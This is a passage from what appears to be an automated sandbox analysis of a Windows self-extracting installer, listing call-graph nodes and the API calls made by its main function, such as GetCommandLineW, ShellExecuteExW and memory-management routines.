9907->9908 9909 401563 9908->9909 9910 401568 WaitForSingleObject 9908->9910 10379 40129c 9908->10379 9911 40786b 23 API calls 9909->9911 9912 401585 9910->9912 9913 4015b7 9910->9913 9911->9910 9916 4015a3 9912->9916 9919 401594 9912->9919 9914 4015b3 9913->9914 9915 4015bf GetExitCodeThread 9913->9915 9914->9523 9917 4015d6 9915->9917 9918 407776 55 API calls 9916->9918 9917->9914 9917->9919 9920 401605 SetLastError 9917->9920 9918->9914 9919->9914 9921 407776 55 API calls 9919->9921 9920->9919 9921->9914 9923 401411 2 API calls 9922->9923 9924 4042ab 9923->9924 9925 401411 2 API calls 9924->9925 9926 4042b7 9925->9926 9926->9518 9940 40f0b6 9927->9940 9929 40b192 9929->9884 9930 40b17e 9930->9929 9943 40adc3 9930->9943 9933 40b297 ??3@YAXPAX 9933->9929 9934 40b2a2 ??3@YAXPAX 9934->9929 9936 40b27a memmove 9937 40b1d9 9936->9937 9937->9933 9937->9934 9937->9936 9938 40b2ac memcpy 9937->9938 9939 40dcfb 3 API calls 9938->9939 9939->9934 9951 40f06b 9940->9951 9944 40add0 9943->9944 9945 40ae0d memcpy 9943->9945 9946 40add5 ??2@YAPAXI 9944->9946 9947 40adfb 9944->9947 9945->9937 9948 40adfd ??3@YAXPAX 9946->9948 9949 40ade5 memmove 9946->9949 9947->9948 9948->9945 9949->9948 9952 40f0af 9951->9952 9953 40f07d 9951->9953 9952->9930 9953->9952 9954 40dcc7 GetLastError 9953->9954 9954->9953 9966 40c9fc 9955->9966 10362 40a28e 9958->10362 9988 40a0bf 9966->9988 10111 40a030 9988->10111 10112 40e8da ctype 3 API calls 10111->10112 10113 40a039 10112->10113 10114 40e8da ctype 3 API calls 10113->10114 10115 40a041 10114->10115 10116 40e8da ctype 3 API calls 10115->10116 10117 40a049 10116->10117 10118 40e8da ctype 3 API calls 10117->10118 10119 40a051 10118->10119 10120 40e8da ctype 3 API calls 10119->10120 10121 40a059 10120->10121 10122 40e8da ctype 3 API calls 10121->10122 10123 40a061 10122->10123 10124 40e8da ctype 3 API calls 10123->10124 10125 40a06b 10124->10125 10126 40e8da ctype 3 API calls 10125->10126 10127 40a073 10126->10127 10128 40e8da ctype 3 API calls 10127->10128 10129 40a080 10128->10129 10130 40e8da ctype 3 API calls 10129->10130 10131 40a088 10130->10131 10132 40e8da ctype 3 API calls 10131->10132 10133 40a095 10132->10133 10134 40e8da ctype 3 API calls 10133->10134 10135 40a09d 10134->10135 10136 40e8da ctype 3 API calls 10135->10136 10137 40a0aa 10136->10137 10138 40e8da ctype 3 API calls 10137->10138 10139 40a0b2 10138->10139 10363 40e8da ctype 3 API calls 10362->10363 10364 40a29c 10363->10364 10380 4012a5 10379->10380 10381 4012b8 10379->10381 10380->10381 10382 4012a7 Sleep 10380->10382 10383 4012f1 10381->10383 10384 4012e3 EndDialog 10381->10384 10382->10380 10384->10383 10386 4021db 10385->10386 10386->9530 10388 4025ae 2 API calls 10387->10388 10389 402992 10388->10389 10390 4029be 10389->10390 10391 402640 2 API calls 10389->10391 10390->9609 10391->10389 10392->9609 10394 4029d2 10393->10394 10395 4029de 10393->10395 10412 4019f0 GetStdHandle WriteFile 10394->10412 10397 4025ae 2 API calls 10395->10397 10401 4029e8 10397->10401 10398 4029d9 10410 402425 ??3@YAXPAX ??3@YAXPAX 10398->10410 10399 402a13 10400 40272e 3 API calls 10399->10400 10402 402a25 10400->10402 10401->10399 10405 402640 2 API calls 10401->10405 10403 402a33 10402->10403 10404 402a47 10402->10404 10406 407776 55 API calls 10403->10406 10407 407776 55 API calls 10404->10407 10405->10401 10408 402a42 ??3@YAXPAX ??3@YAXPAX 10406->10408 10407->10408 10408->10398 10410->9606 10411->9595 10412->10398 10414 4012f7 2 API calls 10413->10414 10415 402676 10414->10415 10416 4012f7 2 API calls 10415->10416 10417 402682 10416->10417 10417->9627 10419 4025ae 2 API calls 10418->10419 10420 402785 10419->10420 10421 4027c1 10420->10421 10424 402628 10420->10424 10421->9654 10425 402634 10424->10425 10426 40263a WideCharToMultiByte 10424->10426 10427 4022b0 2 API calls 10425->10427 10426->10421 10427->10426 10429 407456 10428->10429 10430 40745b 10428->10430 10429->9675 10430->10429 10431 4073d1 21 API calls 10430->10431 10431->10429 10432->9682 10433->9684 10434->9686 10435->9688 10436->9694 10437->9696 10438->9700 10439->9704 10441 40661a 2 API calls 10440->10441 10442 40715c 10441->10442 10442->9712 10446 40716d 10443->10446 10447 40661a 2 API calls 10446->10447 10448 407175 10447->10448 10448->9712 10450 40661a 2 API calls 10449->10450 10451 4071a7 10450->10451 10451->9738 8032 40f3f1 8035 4024e7 8032->8035 8040 40245a 8035->8040 8038 4024f5 8039 4024f6 malloc 8041 40246a 8040->8041 8047 402466 8040->8047 8042 40247a GlobalMemoryStatusEx 8041->8042 8041->8047 8043 402488 8042->8043 8042->8047 8043->8047 8048 401f9d 8043->8048 8047->8038 8047->8039 8049 401fb4 8048->8049 8050 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8049->8050 8051 401fdb 8049->8051 8052 402095 SetLastError 8050->8052 8053 40201d ??2@YAPAXI GetEnvironmentVariableW 8050->8053 8068 407717 8051->8068 8052->8051 8058 4020ac 8052->8058 8054 40204c GetLastError 8053->8054 8067 40207e ??3@YAXPAX 8053->8067 8055 402052 8054->8055 8054->8067 8061 402081 8055->8061 8062 40205c lstrcmpiW 8055->8062 8057 4020cb lstrlenA ??2@YAPAXI 8059 402136 MultiByteToWideChar 8057->8059 8060 4020fc GetLocaleInfoW 8057->8060 8058->8057 8075 401f47 8058->8075 8059->8051 8060->8059 8065 402123 _wtol 8060->8065 8061->8052 8066 40206b ??3@YAXPAX 8062->8066 8062->8067 8064 4020c1 8064->8057 8065->8059 8066->8061 8067->8061 8082 40661a 8068->8082 8071 40773c IsBadReadPtr 8073 40774e 8071->8073 8086 4073d1 8073->8086 8076 401f51 GetUserDefaultUILanguage 8075->8076 8077 401f95 8075->8077 8078 401f72 GetSystemDefaultUILanguage 8076->8078 8079 401f6e 8076->8079 8077->8064 8078->8077 8080 401f7e GetSystemDefaultLCID 8078->8080 8079->8064 8080->8077 8081 401f8e 8080->8081 8081->8077 8083 406643 8082->8083 8084 40666f IsWindow 8082->8084 8083->8084 8085 40664b GetSystemMetrics GetSystemMetrics 8083->8085 8084->8071 8084->8073 8085->8084 8087 4073e0 8086->8087 8088 407444 8086->8088 8087->8088 8098 4024fc 8087->8098 8088->8047 8090 4073f1 8091 4024fc 2 API calls 8090->8091 8092 4073fc 8091->8092 8102 403b7f 8092->8102 8095 403b7f 19 API calls 8096 40740e ??3@YAXPAX ??3@YAXPAX 8095->8096 8096->8088 8099 402513 8098->8099 8111 40112b 8099->8111 8101 40251e 8101->8090 8175 403880 8102->8175 8104 403b59 8116 40393b 8104->8116 8106 403b69 8139 4039f6 8106->8139 8108 403b74 8162 4027c7 8108->8162 8112 401177 8111->8112 8113 401139 ??2@YAPAXI 8111->8113 8112->8101 8113->8112 8115 40115a 8113->8115 8114 40116f ??3@YAXPAX 8114->8112 8115->8114 8115->8115 8198 401411 8116->8198 8120 403954 8205 40254d 8120->8205 8122 403961 8123 4024fc 2 API calls 8122->8123 8124 40396e 8123->8124 8209 403805 8124->8209 8127 401362 2 API calls 8128 403992 8127->8128 8129 40254d 2 API calls 8128->8129 8130 40399f 8129->8130 8131 4024fc 2 API calls 8130->8131 8132 4039ac 8131->8132 8133 403805 3 API calls 8132->8133 8134 4039bc ??3@YAXPAX 8133->8134 8135 4024fc 2 API calls 8134->8135 8136 4039d3 8135->8136 8137 403805 3 API calls 8136->8137 8138 4039e2 ??3@YAXPAX ??3@YAXPAX 8137->8138 8138->8106 8140 401411 2 API calls 8139->8140 8141 403a04 8140->8141 8142 401362 2 API calls 8141->8142 8143 403a0f 8142->8143 8144 40254d 2 API calls 8143->8144 8145 403a1c 8144->8145 8146 4024fc 2 API calls 8145->8146 8147 403a29 8146->8147 8148 403805 3 API calls 8147->8148 8149 403a39 ??3@YAXPAX 8148->8149 8150 401362 2 API calls 8149->8150 8151 403a4d 8150->8151 8152 40254d 2 API calls 8151->8152 8153 403a5a 8152->8153 8154 4024fc 2 API calls 8153->8154 8155 403a67 8154->8155 8156 403805 3 API calls 8155->8156 8157 403a77 ??3@YAXPAX 8156->8157 8158 4024fc 2 API calls 8157->8158 8159 403a8e 8158->8159 8160 403805 3 API calls 8159->8160 8161 403a9d ??3@YAXPAX ??3@YAXPAX 8160->8161 8161->8108 8163 401411 2 API calls 8162->8163 8164 4027d5 8163->8164 8165 4027e5 ExpandEnvironmentStringsW 8164->8165 8166 40112b 2 API calls 8164->8166 8167 402809 8165->8167 8168 4027fe ??3@YAXPAX 8165->8168 8166->8165 8234 402535 8167->8234 8169 402840 8168->8169 8169->8095 8172 402824 8173 401362 2 API calls 8172->8173 8174 402838 ??3@YAXPAX 8173->8174 8174->8169 8176 401411 2 API calls 8175->8176 8177 40388e 8176->8177 8178 401362 2 API calls 8177->8178 8179 403899 8178->8179 8180 40254d 2 API calls 8179->8180 8181 4038a6 8180->8181 8182 4024fc 2 API calls 8181->8182 8183 4038b3 8182->8183 8184 403805 3 API calls 8183->8184 8185 4038c3 ??3@YAXPAX 8184->8185 8186 401362 2 API calls 8185->8186 8187 4038d7 8186->8187 8188 40254d 2 API calls 8187->8188 8189 4038e4 8188->8189 8190 4024fc 2 API calls 8189->8190 8191 4038f1 8190->8191 8192 403805 3 API calls 8191->8192 8193 403901 ??3@YAXPAX 8192->8193 8194 4024fc 2 API calls 8193->8194 8195 403918 8194->8195 8196 403805 3 API calls 8195->8196 8197 403927 ??3@YAXPAX ??3@YAXPAX 8196->8197 8197->8104 8199 40112b 2 API calls 8198->8199 8200 401425 8199->8200 8201 401362 8200->8201 8202 40136e 8201->8202 8204 401380 8201->8204 8203 40112b 2 API calls 8202->8203 8203->8204 8204->8120 8206 40255a 8205->8206 8214 401398 8206->8214 8208 402565 8208->8122 8210 40381b 8209->8210 8211 403817 ??3@YAXPAX 8209->8211 8210->8211 8218 4026b1 8210->8218 8222 402f96 8210->8222 8211->8127 8215 4013dc 8214->8215 8216 4013ac 8214->8216 8215->8208 8217 40112b 2 API calls 8216->8217 8217->8215 8219 4026c7 8218->8219 8220 4026db 8219->8220 8226 402346 memmove 8219->8226 8220->8210 8223 402fa5 8222->8223 8225 402fbe 8223->8225 8227 4026e6 8223->8227 8225->8210 8226->8220 8228 4026f6 8227->8228 8229 401398 2 API calls 8228->8229 8230 402702 8229->8230 8233 402346 memmove 8230->8233 8232 40270f 8232->8225 8233->8232 8235 402541 8234->8235 8236 402547 ExpandEnvironmentStringsW 8234->8236 8237 40112b 2 API calls 8235->8237 8236->8172 8237->8236 11181 40e4f9 11182 40e516 11181->11182 11183 40e506 11181->11183 11186 40de46 11183->11186 11189 401b1f VirtualFree 11186->11189 11188 40de81 ??3@YAXPAX 11188->11182 11189->11188

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00404FAA Relevance: 250.2, APIs: 103, Strings: 39, Instructions: 1671keyboardsynchronizationwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                                                                                                                                                                                                  • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                                                                                                                                                                                                  • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                                                                                                                                                                                                  • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                                                                                                                                                                                                  • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                                                                                                                                                                                                                                  • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                                                                                                                                                                                                  • Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                                                                                                                                                                                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                                                                                                                                                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                                                                                                                                                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                                                                                                                                                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                                                                                                                                                                                                  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                                                                                                                                                                                                                                  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                                                                                                                                                                                                                                • _wtol.MSVCRT ref: 0040509F
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                                                                                                                                                                                                                                • _wtol.MSVCRT ref: 00405217
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                                                                                                                                                                                                                                                  • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                                                                                                                                                                                                  • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                                                                                                                                                                                                  • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                                                                                                                                                                                                                                  • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                                                                                                                                                                                                  • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                                                                                                                                                                                                  • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                                                                                                                                                                                                  • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                                                                                                                                                                                                  • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                                                                                                                                                                                                                                  • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                                                                                                                                                                                                                                  • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                                                                                                                                                                                                                                  • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                                                                                                                                                                                                                                  • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00405595
                                                                                                                                                                                                                                                • _wtol.MSVCRT ref: 004057DE
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 004059E9
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                                                                                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 00405AA1
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004060AE
                                                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                                                                                                                                                                                                                                • _wtol.MSVCRT ref: 00405F65
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
